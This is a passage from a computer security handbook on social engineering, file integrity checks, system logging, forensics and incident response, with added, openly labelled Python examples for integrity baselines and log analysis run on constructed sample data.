Most of the newer and more dangerous programmed threats are blended threats. A blended threat is a programmed attack that combines the features of several other kinds of attacks and propagates through multiple vectors. A typical blended threat might be a network worm that propagates by e-mailing copies of itself to addresses in the infected computer's address book or through file sharing with other connected systems; once it has infected a machine, the worm installs a back door, a zombie for coordinating a future distributed denial of service attack, and a logic bomb. Defending against blended threats is like defending against single-vector attacks, but requires that you consider all of the vectors. A layered defense is the best practice for avoiding blended threats.

Social Engineering

On many computer systems it is possible to exploit bugs or other vulnerabilities to parlay the ordinary access granted to normal users into the "superuser" or "administrative" access that is granted to system operators. Thus, with a stolen username and password, a moderately skilled attacker can gain full run of many systems. One of the most common ways for an attacker to get a username and password is social engineering.

Social engineering is one of the simplest and most effective means of gaining unauthorized access to a computer system. In a social engineering attack, the attacker typically telephones the target organization and tries to talk someone into giving up information. For example, the attacker might pretend to be a new employee who has forgotten the password for his or her account and needs to have the password "reset."
Or the attacker might pretend to be a service representative, claiming that the Administrator account needs to have its password changed so that routine maintenance can be performed. Social engineering attacks are effective because people generally want to be helpful; they are the computer equivalent of confidence games.

Social engineering can also be automated. There are many so-called phishing programs that will send social engineering e-mails to thousands or tens of thousands of users at a time. Some programs solicit usernames and passwords. Others try for valid credit cards.

The most effective defense against social engineering is a vigorous user education program. Users should be taught (and reminded frequently) not to divulge any security-related information to anyone they do not already know to be an authentic organization security employee, and then only in person. Users should be told that security personnel will never ask them to divulge their passwords, credit card numbers, or other authenticators, and that anyone or any message that does should be immediately reported to the computer staff. Help desk procedures should back this up: a request such as a password reset should be verified by calling the requester back at a number already on record, never at a number the caller supplies.

CHAPTER 9. DETECTING AND MANAGING A BREAK-IN

At a Glance

Despite your best efforts, you may have to deal with a compromised system. This chapter discusses how you can use auditing, logging, and forensics to help detect compromises and identify what's been modified on a compromised system, and provides step-by-step guidance for how to recover from an attack.

Auditing and Logging

After you have established the protection mechanisms on your system, you will want to be sure that your protection mechanisms actually work. You will also want to observe any indications of misbehavior or other problems. This process is known as monitoring or auditing. Two of the most common audits are inspections of file integrity and review of system log files.
File Integrity Checks

Although there are many reasons that you might want to examine the integrity of your system's files, one of the most common reasons is to determine what has changed after a computer has been attacked, broken into, and compromised. There are basically three approaches to detecting changes to files:

1. Use comparison copies of the data to be monitored; this is the most certain way.
2. Monitor metadata about the items to be protected; this includes monitoring the modification time of entries as kept by the operating system, and monitoring any logs or audit trails that show alterations to files.
3. Use some form of signature of the data to be monitored, and periodically recompute and compare the signature against a stored value.

Each of these approaches has drawbacks and benefits. Whichever you choose, there are several ways you can examine a potentially compromised system:

· Physically remove the hard disk from the computer in question, attach the disk to a second computer as an auxiliary disk, boot the second computer, mount the disk read-only, and use the second computer's operating system to examine the disk (or make a block-for-block copy to examine).
· Leave the suspect disk in the suspect computer, but boot the suspect computer with a clean operating system from a CD-ROM or a floppy disk. Then, using only the tools on the CD-ROM or floppy, you could proceed to mount the suspect disk read-only and analyze the possibly compromised filesystem.
· Log into the suspect computer and run whatever integrity-checking tools happen to be installed.

Clearly, the most thorough way to examine the suspect system is the first technique. In practice, the third technique is the most common, but it is completely inadequate. If an attacker truly compromises your computer system, nothing can be trusted, including the integrity-checking software or databases.
Comparison Copies

The safest and most direct method of detecting changes to data is to keep a copy of the unaltered data, and do a byte-by-byte comparison when needed. If there is a difference, this indicates not only that a change occurred, but what that change involved.

Comparison copies, however, are unwieldy. They require that you keep copies of every file of interest. Not only does such a method require twice as much storage as the original files, it also may involve a violation of license or copyright of the files (in general, copyright laws allow one copy for archival purposes, and your distribution media is that one copy).243 To use a comparison copy means that both the original and the copy must be read through, byte by byte, each time a check is made. And, of course, the comparison copy needs to be saved in a protected location.

Even with these drawbacks, comparison copies have a particular benefit--if you discover an unauthorized change, you can simply replace the altered version with the saved comparison copy, thus restoring the system to normal. These copies can be made locally, at remote sites, or over the network, as we describe in the following sections.

Local copies

One standard method of storing comparison copies is to put them on another disk, particularly on removable media. Many people report success with storing copies of critical system files on removable media drives.244 If there is any question about a particular file, the appropriate disk is placed in the drive, mounted, and compared. If you are careful about how you configure these disks, you get the added (and valuable) benefit of having a known good version of the system to boot up if the system is compromised by accident or attack. Making regular backups to removable or write-once media such as tapes and CDs can provide similar benefits.
A second standard method of storing comparison copies is to make on-disk copies somewhere else on the system. You can compress and/or encrypt the copy to help reduce disk use and keep it safe from tampering. The disadvantage to compression and encryption is that it then requires extra processing to recover the files if you want to compare them against the working copies. This extra effort may be significant if you wish to do comparisons daily (or more often!). Moreover, you can't protect the encryption program itself this way.

Remote copies

A third method of using comparison copies is to store them on a remote site and make them available remotely in some manner. For instance, you might place copies of all the system files on a disk partition on a secured server, and export or share that partition read-only using NFS or some similar protocol. All the client hosts could then mount that partition and use the copies in local comparisons. Of course, you need to ensure that whatever programs are used in the comparison are taken from the remote partition and not from the local disk. Otherwise, an attacker could modify those files to not report changes! Another method of remote comparison involves using a program such as rdist to do the comparison across the network. (PUIS, 626-627)

Remember that it is not enough to keep copies of executable programs. Shared libraries and configuration files must usually be compared as well.

Checklists and Metadata

Saving an extra copy of each critical file and performing a byte-by-byte comparison can be unduly expensive. It requires substantial disk space to store the copies. Furthermore, if the comparison is performed over the network, it will involve substantial disk and network overhead each time the comparisons are made. A more efficient approach is to store a summary of important characteristics of each file and directory.
When the time comes to do a comparison, the characteristics are regenerated and compared with the saved information. If the characteristics are comprehensive and smaller than the file contents (on average), then this method is clearly a more efficient way of doing the comparison. Furthermore, this approach can capture changes that a simple comparison copy cannot: comparison copies detect changes in the contents of files, but do little to detect changes in metadata such as file owners, protection modes, or modification times. These data are sometimes more important than the data within the files themselves. For instance, changes in owner or protection bits may result in disaster if they occur to the wrong file or directory.

The simplest form of a checklist mechanism is to list the files with their attributes, and compare the output against a saved version of the list. It's usually necessary to include all the ancestor directories of important files in the checklist as well.

Checksums and Signatures

Unfortunately, simple checklists can be defeated with a little effort. Files can be modified in such a way that the information you monitor will not disclose the change. For instance, a file might be modified by writing to the raw disk device after the appropriate block is known. As the modification did not go through the filesystem, none of the information about file change time will be altered. Or an attacker could set the system clock back to the time of the last legitimate change, edit the file, and set the clock forward again. To protect against these threats, we can generate a signature for each file, and compare file signatures.

243 Copyright laws--and many licenses--do not allow for copies on backups.
244 Note that an external Firewire-based disk drive fits this description.
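The following script is an added example, not Handbook code and not Tripwire, of combining the checklist approach with per-file signatures. For every entry under a directory it records the checklist metadata (type and permission bits, owner, group, size, modification time) together with a SHA-256 digest of regular file contents, saves that as a baseline, and on a later run reports what was added, removed, or changed and which fields changed. The demo tampers with a constructed sample tree in the ways described above: it rewrites a program with same-sized content and puts the modification time back (standing in for the "set the clock back" trick), changes a file's permissions, and adds a file. The digest choice, the JSON baseline format and the sample files are the example's own assumptions; storing the baseline and the checker on read-only media, as the text advises, is left to you.

```python
"""Checklist-plus-digest integrity baseline. Added example; not Handbook code."""
import hashlib
import json
import os
import stat
import tempfile

DIGEST = "sha256"  # assumption: SHA-256, a currently collision-resistant digest


def digest_file(path):
    h = hashlib.new(DIGEST)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Return {relative path: record} for every entry below root."""
    records = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            rec = {
                "mode": oct(st.st_mode),  # file type plus permission, set-UID/GID bits
                "uid": st.st_uid,
                "gid": st.st_gid,
                "size": st.st_size,
                "mtime": st.st_mtime_ns,  # recorded, but never trusted on its own
            }
            if stat.S_ISREG(st.st_mode):
                rec["digest"] = digest_file(full)
            elif stat.S_ISLNK(st.st_mode):
                rec["target"] = os.readlink(full)
            records[os.path.relpath(full, root)] = rec
    return records


def compare(baseline, current):
    """Report entries added, removed, or changed, and which fields changed."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = {}
    for rel in sorted(set(baseline) & set(current)):
        fields = sorted(k for k in set(baseline[rel]) | set(current[rel])
                        if baseline[rel].get(k) != current[rel].get(k))
        if fields:
            changed[rel] = fields
    return {"added": added, "removed": removed, "changed": changed}


def save_baseline(records, path):
    with open(path, "w") as f:
        json.dump(records, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def demo():
    """Constructed sample: build a tree, take a baseline, tamper, and return the report."""
    root = tempfile.mkdtemp(prefix="integrity-")
    os.makedirs(os.path.join(root, "bin"))
    os.makedirs(os.path.join(root, "etc"))
    program = os.path.join(root, "bin", "program")
    config = os.path.join(root, "etc", "config")
    with open(program, "w") as f:
        f.write("#!/bin/sh\nexit 0\n")
    os.chmod(program, 0o755)
    with open(config, "w") as f:
        f.write("allow = admin\n")
    os.chmod(config, 0o644)

    baseline_path = os.path.join(tempfile.mkdtemp(prefix="baseline-"), "baseline.json")
    save_baseline(snapshot(root), baseline_path)

    # 1. Same-length content change with the mtime put back: a plain checklist
    #    sees nothing, the digest does.
    st = os.lstat(program)
    with open(program, "w") as f:
        f.write("#!/bin/sh\nexit 1\n")
    os.utime(program, ns=(st.st_atime_ns, st.st_mtime_ns))
    # 2. Permission change only; contents and digest are untouched.
    os.chmod(config, 0o666)
    # 3. A new file that was not in the baseline.
    with open(os.path.join(root, "backdoor"), "w") as f:
        f.write("x\n")

    return compare(load_baseline(baseline_path), snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Running the demo reports bin/program changed only in its digest, etc/config changed only in its mode, and backdoor as added. In production, generate the baseline from a known-good boot, keep the baseline and this checker on write-once or removable media, and run the comparison from that known-good copy, since a compromised system can lie to a checker that lives on its own disk.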
A good file signature must depend on every bit in the file, and it should be infeasible for an attacker to create another file that produces the same signature. These requirements disqualify simple checksum algorithms (like CRC), but are met by cryptographic message digests (discussed in chapter 5-3). Choose a digest that is still considered collision-resistant: MD5 and SHA-1 no longer are, so prefer a SHA-2 digest such as SHA-256. Well-developed software for file integrity checking computes at least one, and often several, cryptographic digests of each file and its metadata. When a known good copy of the checker is used to generate file signatures in advance, and these signatures are stored safely (on write-once or removable media, for example), any changes to the files can be detected by running the known good copy again and comparing the signatures. One well known multi-platform package for doing this is Tripwire (http://www.tripwire.com); an open source version is available for Linux at no cost.

Log Files

A log file is a file that records one or more log events -- that is, a specific action, activity or condition that the author of a program thought might be worth recording. Log files are an important building block of a secure system: they form a recorded history, or audit trail, of your computer's past, making it easier for you to track down intermittent problems or attacks. Using log files, you may be able to piece together enough information to discover the cause of a bug, the source of a break-in, or the scope of the damage involved. In cases where you can't stop damage from occurring, at least you will have some record of it. Those logs may be exactly what you need to rebuild your system, conduct an investigation, give testimony, recover insurance money, or get accurate field service performed.

Logs can be recorded in multiple locations:

· The logs can be stored on the computer responsible for the log event. For example, on modern Unix systems, logs are stored in the directory /var/log, although other directories can be used by specific programs in specific cases.
Windows NT-based systems collect messages from the operating system and applications about events and store them in a unified log file (often C:\WINNT\system32\config\SysEvent.Evt), although individual applications may also maintain their own log files.
· The logs can be sent over the network to a remote computer to be aggregated and stored. This computer, sometimes called a log server, can be used as a central location for monitoring many computers on a network. A log server can further be configured with a host-based firewall so that it accepts log messages from other computers but is otherwise prohibited from transmitting packets on the network. Using a remote log server helps prevent attackers from erasing their tracks. A centralized, remote logging system may also be an ideal place to run intrusion detection software on the collected logs.
· The logs can be written to write-once media or printed on a printer. These logs are virtually impossible to erase without physical access, but can become unwieldy to maintain.

For security reasons, some information should never be logged. For example, although you should log failed password attempts, you should not log the password that was used in the failed attempt. Users frequently mistype their own passwords, and logging these mistyped passwords would help an attacker break into a user's account. Some system administrators believe that the account name should also not be logged on failed login attempts--especially when the account typed by the user is nonexistent. The reason is that users occasionally type their passwords when they are prompted for their usernames.
Essential Log Events

Although different systems and applications log different events, some kinds of events are essential, and should be logged by any reasonably secure computer:

· Network connections from remote hosts, dialup connections on modems, and dial-out connections by modems. In some cases, logging overall data traffic patterns may reveal excessive outgoing data caused by an attacker using the computer as a staging ground for pirated software, or publishing your confidential data.
· User login times and locations. Seeing someone logging into the account of a local user from out of the country or at unusual hours may signal an intruder.
· Failed login attempts, which may alert you to attackers knocking on your computer's door.
· Process-level accounting, including process start and end times, ownership and privileges, and CPU utilization. This kind of accounting can reveal every command issued on your system, and is very helpful in analyzing security breaches, if it's intact.
· System shutdowns and reboots. Unexpected reboots may indicate a hardware problem, an attacker with physical access restarting the system in single-user mode, or a remote attacker covering his tracks in memory.
· Exceptional events reported by the operating system (such as disk full conditions). These always require attention, whether or not they are caused by an attacker.

Every event that's logged should include the process that generated the event and the date and time that it occurred. Most logging systems assign each logged event to a category or facility that describes the source of the event (such as `mail' or `network' or `kernel'), and a priority or severity that describes the importance of the event (such as `informational', `warning', or `critical error').
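As an added example (not Handbook code, and not Swatch or any other named analyzer), the following script parses the traditional Unix syslog line format, timestamp, host, program[pid]: message, and applies a few of the checks that the list of essential events above calls for: repeated failed logins from one source, a successful login from a source that had just been failing, logins outside working hours, shutdowns or reboots, and kernel exceptions. The log lines are constructed sample data in that format; the sshd message wording, the 07:00 to 19:00 "working hours" window and the failure threshold are assumptions made for the example.

```python
"""Syslog-style log analysis. Added example; not Handbook code and not Swatch."""
import re

# Constructed sample log (not captured from a real system). 203.0.113.0/24 is a
# documentation address range.
SAMPLE_LOG = """\
Aug 14 08:02:12 r2 sshd[4011]: Accepted password for alice from 10.0.1.20 port 50122 ssh2
Aug 14 08:02:30 r2 postfix/local[81859]: 80AD8E44308: to=<jhalonen@ex.com>, relay=local, delay=1, status=bounced (unknown user: "jhalonen")
Aug 14 23:41:05 r2 sshd[4102]: Failed password for root from 203.0.113.7 port 40211 ssh2
Aug 14 23:41:09 r2 sshd[4102]: Failed password for root from 203.0.113.7 port 40211 ssh2
Aug 14 23:41:14 r2 sshd[4102]: Failed password for invalid user admin from 203.0.113.7 port 40213 ssh2
Aug 14 23:41:20 r2 sshd[4102]: Failed password for invalid user admin from 203.0.113.7 port 40213 ssh2
Aug 14 23:42:01 r2 sshd[4110]: Accepted password for root from 203.0.113.7 port 40220 ssh2
Aug 14 23:50:00 r2 shutdown[4200]: shutting down for system reboot
Aug 15 03:15:42 r2 kernel: disk full on /var
"""

# Traditional syslog line: "Mon dd hh:mm:ss host program[pid]: message" (pid optional).
SYSLOG = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) "
    r"(?P<host>\S+) "
    r"(?P<prog>[^\[:\s]+)(?:\[(?P<pid>\d+)\])?: "
    r"(?P<msg>.*)$"
)
# Assumed sshd wording; adjust to what your own login service writes.
FAILED = re.compile(r"Failed \w+ for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)")
ACCEPTED = re.compile(r"Accepted \w+ for (?P<user>\S+) from (?P<src>\S+)")


def parse(line):
    """Split one syslog line into its fields, or return None if it is not one."""
    m = SYSLOG.match(line)
    if not m:
        return None
    event = m.groupdict()
    event["hour"] = int(event["ts"][-8:-6])  # traditional stamps carry no year
    return event


def analyze(text, fail_threshold=3, work_hours=(7, 19)):
    """Return a list of (alert kind, detail) tuples, in log order."""
    alerts = []
    failures = {}  # source address -> failed logins seen so far
    for event in filter(None, map(parse, text.splitlines())):
        msg, prog = event["msg"], event["prog"]
        fm = FAILED.search(msg)
        if fm:
            n = failures[fm["src"]] = failures.get(fm["src"], 0) + 1
            if n == fail_threshold:  # alert once, when the threshold is reached
                alerts.append(("repeated-failed-logins", fm["src"]))
            continue
        am = ACCEPTED.search(msg)
        if am:
            who = f'{am["user"]} from {am["src"]}'
            if failures.get(am["src"]):
                alerts.append(("success-after-failures", who))
            if not work_hours[0] <= event["hour"] < work_hours[1]:
                alerts.append(("off-hours-login", who))
            continue
        if prog in ("shutdown", "reboot", "init"):
            alerts.append(("shutdown-or-reboot", msg))
        elif prog == "kernel":
            alerts.append(("kernel-exception", msg))
    return alerts


if __name__ == "__main__":
    for kind, detail in analyze(SAMPLE_LOG):
        print(f"{kind:24} {detail}")
```

On the sample the script raises five alerts: the third failure from 203.0.113.7, then the root login from that same address (flagged twice, as a success after failures and as an off-hours login), the reboot, and the kernel's disk-full report; the normal morning login and the bounced mail produce nothing. That filtering, routine events suppressed and the notable ones surfaced in order, is what a log analysis tool does for you on a server that logs thousands of lines an hour.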
Here is an example of a message logged by a Unix system:

Aug 14 08:02:12 r2 postfix/local[81859]: 80AD8E44308: to=<jhalonen@ex.com>, relay=local, delay=1, status=bounced (unknown user: "jhalonen")

This message was generated by the postfix program called local. It reports that an e-mail message with the id 80AD8E44308 was received for the user jhalonen@ex.com. The message was bounced, because there is no user jhalonen@ex.com. The event's facility is mail; the priority is info. (See PUIS, 642-654 for a detailed discussion of Unix logging facilities, priorities, and configuration.)

Log File Analysis

It's not enough to log events--you must read the logs. On a busy server that may log hundreds or thousands of events an hour, this can be a daunting task. Log file analysis programs attempt to streamline the job by filtering log files to direct your attention toward important events and away from routine ones. Some analysis software, like Microsoft's Event Viewer, lets you interactively view logs through filters of your choice. Other software, like the Swatch program often used on Unix servers, monitors logs in real-time and issues alerts when important events occur. (PUIS, 654-657)

Program-Specific Log Files

Most application programs, especially daemons, will maintain their own log files. FTP and web servers routinely log connections and file transfers, DNS name servers log domain transfers and queries, database servers log queries, and mail servers routinely log connection and message size information when sending or receiving messages. Errors and exceptional conditions are nearly always logged. In many cases, application-specific log analysis tools have been developed to summarize these logs in a more useful fashion.

Handwritten Logs

Another type of logging that can help you with security is not done by the computer at all; it is done by you and your staff. Keep a log book that records your day's activities.
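As an added example (not code from the handbook or from PUIS), here is a small Python parser for the BSD-style syslog line format shown above and for the key=value fields of the postfix message. The regular expressions and field names are this example's own assumptions, and the sample line restores the recipient in postfix's usual to=<address> form:

```python
import re
from typing import Optional

# Constructed sample: the postfix message quoted in the handbook, with the
# recipient restored in postfix's "to=<address>" form (assumption).
SAMPLE_LINE = ('Aug 14 08:02:12 r2 postfix/local[81859]: 80AD8E44308: '
               'to=<jhalonen@ex.com>, relay=local, delay=1, '
               'status=bounced (unknown user: "jhalonen")')

# Classic BSD syslog file line: "Mon DD HH:MM:SS host program[pid]: message".
# The facility and priority are normally not written into the file in this
# format; syslogd only uses them to route the message, so they have to be
# inferred from the program name (postfix/local -> mail) if needed.
SYSLOG_RE = re.compile(
    r'^(?P<month>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) '
    r'(?P<host>\S+) (?P<program>[^\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<message>.*)$')

# Postfix delivery-agent message: "<queue id>: key=value, ..., status=X (reason)".
POSTFIX_RE = re.compile(r'^(?P<queue_id>[0-9A-F]+): (?P<fields>.*)$')
FIELD_RE = re.compile(r'(\w+)=(<[^>]*>|[^,]+?)(?:, |$)')


def parse_syslog_line(line: str) -> Optional[dict]:
    """Split a BSD-style syslog line into header fields and the free-text message.

    Returns None for lines that do not match, so a caller can count or
    inspect them instead of silently dropping them."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['pid'] = int(rec['pid']) if rec['pid'] else None
    return rec


def parse_postfix_message(message: str) -> Optional[dict]:
    """Parse the queue id and key=value pairs of a postfix delivery message.

    A status such as 'bounced (unknown user: "jhalonen")' is split into the
    status keyword and its parenthesised reason."""
    m = POSTFIX_RE.match(message)
    if not m:
        return None
    fields = {'queue_id': m.group('queue_id')}
    for key, value in FIELD_RE.findall(m.group('fields')):
        fields[key] = value.strip('<>')
    status = fields.get('status', '')
    if ' (' in status and status.endswith(')'):
        fields['status'], reason = status.split(' (', 1)
        fields['reason'] = reason[:-1]
    return fields


if __name__ == '__main__':
    header = parse_syslog_line(SAMPLE_LINE)
    print(header)
    print(parse_postfix_message(header['message']))
```

The parser deliberately returns None rather than raising on an unrecognised line: in a log review, the lines that do not fit the expected format are often exactly the ones worth a second look.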
Log books should be kept on paper in a physically secure location. Because you keep them on paper, they cannot be altered by someone hacking into your computer even as superuser. They will provide a nearly tamperproof record of important information. Handwritten logs have several advantages over online logs. You can record things that the computer won't, like bomb threats. You can access paper logs when the system is down. In some countries, there can be legal advantages to paper logs as evidence. The biggest problem with log books is the amount of time you need to keep them up to date. These are not items that can be automated with a shell script. Unfortunately, this time requirement is the biggest reason why many administrators are reluctant to keep logs--especially at a site with hundreds (or thousands) of machines, each of which might require its own log book. We suggest that you try to be creative and think of some way to balance the need for good records against the drudgery of keeping multiple books up to date. Compressing information, and keeping logs for each cluster of machines are ways to reduce the overhead while receiving (nearly) the same benefit. There are basically two kinds of log books: per-site logs and per-machine logs. In a per-site log book, you want to keep information that would be of use across all your machines and throughout your operations. The information can be further divided into exception and activity reports (power outages, alarm tests and triggers, personnel actions on employees with privileged access), and informational material (contact information, receipts for hardware and software, equipment serial numbers, MAC addresses for Ethernet machines, copies of router configurations, etc.). Each machine should also have a log book associated with it. 
In a per-machine log, exception and activity reports include notes about system crashes, downtimes, account creation and deletion, password changing, software installation, and system backups. Informational material might include copies of configuration files, lists of patches applied, and disk configurations.

Managing Log Files

Here are several final suggestions about log files:

Backups
Ensure that all of your log files are copied to your backup media on a regular basis, preferably daily. The timing of the backups should be such that any file that is periodically reset is copied to the backups before the reset is performed. This will ensure that you have a series of records over time to show system access and behavior.

Review
Review log files at least daily. Keeping log records does you little service if you do not review them on a regular basis. Log files can reveal problems with your hardware, with your network configuration, and (of course) with your security.

Processing
Filter your log files with analysis software. Many log messages record nothing of particular interest. You may become so accustomed to seeing this material that you get in the habit of making only a cursory scan of the messages to see if something is wrong, and this way you can easily miss an important message. Filtering requires some care. You do not want to write a filter that selects those important things you want to see and discards the rest. Such a system is likely to result in an important message being discarded without being read. Instead, you should filter out the boring messages, being as specific as you can with your pattern matching, and pass everything else to you to be read. Periodically, you should also study unfiltered log messages to be sure that you are not missing anything of importance.

Trust
Don't trust your logs completely!
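As an added example of the filtering approach recommended under Processing (not code from the handbook), the following Python function suppresses only messages that match deliberately narrow, anchored patterns for known-routine events and passes everything else through. It also reports how many lines each pattern hid, so the unfiltered picture can still be reviewed from time to time. The patterns and the sample log lines are constructed for this example:

```python
import re
from collections import Counter

# Patterns for messages known to be routine on this (fictitious) host.  Each is
# anchored at the start of the line and as specific as possible, so that an
# unexpected variant (a different user, an unusual host, a different status)
# falls through the filter and is shown to the reader.
BORING_PATTERNS = {
    'cron-session': re.compile(
        r'^\w{3} +\d+ \d\d:\d\d:\d\d \S+ CRON\[\d+\]: '
        r'pam_unix\(cron:session\): session (opened|closed) for user root'),
    'ntp-sync': re.compile(
        r'^\w{3} +\d+ \d\d:\d\d:\d\d \S+ ntpd\[\d+\]: kernel time sync status'),
    'postfix-local-delivery': re.compile(
        r'^\w{3} +\d+ \d\d:\d\d:\d\d \S+ postfix/local\[\d+\]: [0-9A-F]+: '
        r'to=<[^>]+>, relay=local, delay=\d+, status=sent'),
}


def filter_log(lines, patterns=BORING_PATTERNS):
    """Drop lines matching a known-boring pattern; pass everything else through.

    Returns (interesting_lines, suppressed_counts).  The counts tell you how
    much each pattern is hiding, which is the first thing to check when you
    periodically re-read the unfiltered log."""
    interesting = []
    suppressed = Counter()
    for line in lines:
        for name, pattern in patterns.items():
            if pattern.match(line):
                suppressed[name] += 1
                break
        else:                      # no pattern matched: the reader sees it
            interesting.append(line)
    return interesting, suppressed


# Constructed sample log (not from any real system).
SAMPLE_LOG = """\
Aug 14 08:00:01 r2 CRON[81801]: pam_unix(cron:session): session opened for user root by (uid=0)
Aug 14 08:00:01 r2 CRON[81801]: pam_unix(cron:session): session closed for user root
Aug 14 08:02:12 r2 postfix/local[81859]: 80AD8E44308: to=<jhalonen@ex.com>, relay=local, delay=1, status=bounced (unknown user: "jhalonen")
Aug 14 08:02:13 r2 postfix/local[81859]: 80AD8E44309: to=<george@ex.com>, relay=local, delay=1, status=sent (delivered to mailbox)
Aug 14 08:17:40 r2 ntpd[402]: kernel time sync status change 2001
Aug 14 08:31:05 r2 sshd[81902]: Failed password for root from 203.0.113.7 port 4412 ssh2
Aug 14 08:31:09 r2 CRON[81910]: pam_unix(cron:session): session opened for user www by (uid=0)
""".splitlines()

if __name__ == '__main__':
    shown, hidden = filter_log(SAMPLE_LOG)
    for line in shown:
        print(line)
    print('suppressed:', dict(hidden))
```

Note what survives the filter in the sample: the bounced delivery (the status differs from the routine "sent"), the failed ssh password, and a cron session for an unexpected user. A filter written the other way round, selecting only the things you expect to care about, would have shown none of the third kind.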
Logs can often be altered or deleted by an intruder who obtains superuser privileges. Local users with physical access or appropriate knowledge of the system may be able to falsify or circumvent logging mechanisms. And, of course, software errors and system errors may result in logs not being properly collected and saved. Thus, you need to develop redundant scanning and logging mechanisms: because something is not logged does not mean it didn't happen. Of course, simply because something was logged doesn't mean it did happen, either--someone may cause entries to be written to logs to throw you off the scent of a real problem or to point a false accusation at someone else.

Forensics

The information in log files is, for the most part, intentionally put there as a result of a programmer's decision. But a running system records other information as well. In recent years, there has been significant interest in computer forensics, the art of reading the tracks that are left in a computer system. Although not obvious, some files that are often kept on a per-user basis can be helpful in analyzing when something untoward has happened on your system. While not real log files, as such, these files can be treated as possible sources of information on user behavior.

Shell History

Many of the standard Unix user command shells, including bash, csh, tcsh, and ksh, can keep a history file. When the user issues commands, the text of each command and its arguments are stored into the history file for later re-execution. If you are trying to recreate activity performed on an account, possibly by some intruder, the contents of this file can be quite helpful when coupled with system log information. You must check the modification time on the file to be sure that it was in use during the time the suspicious activity occurred.
If it was created and modified during the intruder's activities, you should be able to determine the commands run, the programs compiled, and sometimes even the names of remote accounts or machines that might also be involved in the incident. Be sure of your target, however, because this is potentially a violation of privacy for the real user of this account. Obviously, an aware intruder will delete the file before logging out. In some cases, however, you can preserve the file either by forcing the intruder to log out, by making a hard link to the file elsewhere before the intruder logs out, or by recovering the deleted file. (PUIS, 677-678)

Mail

Some user accounts are configured to make a copy of all outgoing mail in a file. If an intruder sends mail from a user account where this feature is set, the message copies can provide you with potentially useful information. In at least one case we know of, a person stealing confidential information by using a coworker's pirated password was exposed because of recorded e-mail to his colleagues that he signed with his own name!

Network Setup

Each user account may have several network configuration properties or files that can be edited to provide shortcuts for commands, or to assert access rights. Sometimes, the information in these files will provide a clue as to the activities of a malefactor. Unix examples include the .rhosts, .ssh/known_hosts, and .ssh/authorized_keys files for remote logins, and the .netrc file for FTP. Examine these files carefully for clues, but remember: the information in one of these files may have been there prior to the incident, or it may have been planted to throw you off.

Handling a Break-in

You should have an action plan prepared to deal with a security breach. Particularly security-conscious organizations should practice the plan. Here are the key components you should include:

Step 1: Identify and understand the problem.
Don't panic, and don't act without thinking.
If you don't know what the problem is, you cannot take action against it. This rule does not mean that you need to have perfect understanding, but you should understand at least what form of problem you are dealing with. Cutting your organization's Internet connection won't help you if the problem is being caused by a revenge-bent employee with a laptop who is hiding out in a co-worker's office.

Step 2: Document.
Whether your goal is to get your system running again as soon as possible, or to collect evidence for a prosecution, you will be better off if you document what you do. Start a paper log immediately. Take a notebook and write down everything you find, noting the date and time. If you examine text files, print copies, and then sign and date the hardcopy. In larger organizations, there may be an internal response team or security officer tasked to handle break-ins, contain damage, or coordinate responses. If your organization has such an internal incident reporting system, ensure that they are involved at an early stage to assist with preservation of documentation as well as response.

Step 3: Contain or stop the damage.
If you've identified the problem, take immediate steps to halt or limit it. For instance, if you've identified the employee who is deleting system files, you'll want to turn off his account, and probably take disciplinary action as well. Both are steps to limit the damage to your data and system.

Step 4: Confirm your diagnosis and determine the damage.
After you've taken steps to contain the damage, confirm your diagnosis of the problem and determine the damage it caused. Are files still disappearing after the employee has been discharged? You may never be 100% sure if two or more incidents are actually related. Furthermore, you may not be able to identify all of the damage immediately, if ever.

Step 5: Preserve the evidence, if necessary.
If you intend to prosecute or seek legal redress for your incident, you must make an effort to preserve necessary evidence before going further. Failure to preserve evidence does not prohibit you from calling the police or filing a suit against the suspected perpetrator, but the lack of evidence may significantly decrease your chances for success. Be advised: preserving evidence can take time and is hard to do properly. For this reason, many organizations dealing with incidents forgo this step.

Step 6: Restore your system.
After you know the extent of the damage, you need to restore the system and data to a consistent state. This may involve reloading portions of the system from back-ups, or it may mean a simple restart of the system. Before you proceed, be certain that all of the programs you are going to use are "safe." The attacker may have replaced your restore program with a Trojan horse that deletes both the files on your hard disk and on your backup tape!

Step 7: Deal with the cause.
If the problem occurred because of some weakness in your security or operational measures, you'll want to make changes and repairs after your system has been restored to a normal state. If the cause was a person making a mistake, you will probably want to educate him or her to avoid a second occurrence of the situation. If someone purposefully interfered with your operations, you may wish to involve law enforcement authorities.

Step 8: Perform related recovery.
If damage caused by the attack is covered by insurance, you may need to file claims. Rumor control, and perhaps even community relations, will be required at the end of the incident to explain what happened, what breaches occurred, and what measures were taken to resolve the situation. This step is especially important with a large user community, because unchecked rumors and fears can often damage your operations more than the problem itself.

Step 9: Postmortem.
Once the heat has died down, review the incident and your handling of it. How could you and your team have handled the situation better? What effort was wasted? What wrong decisions were made? How could you have prevented it from happening in the first place?

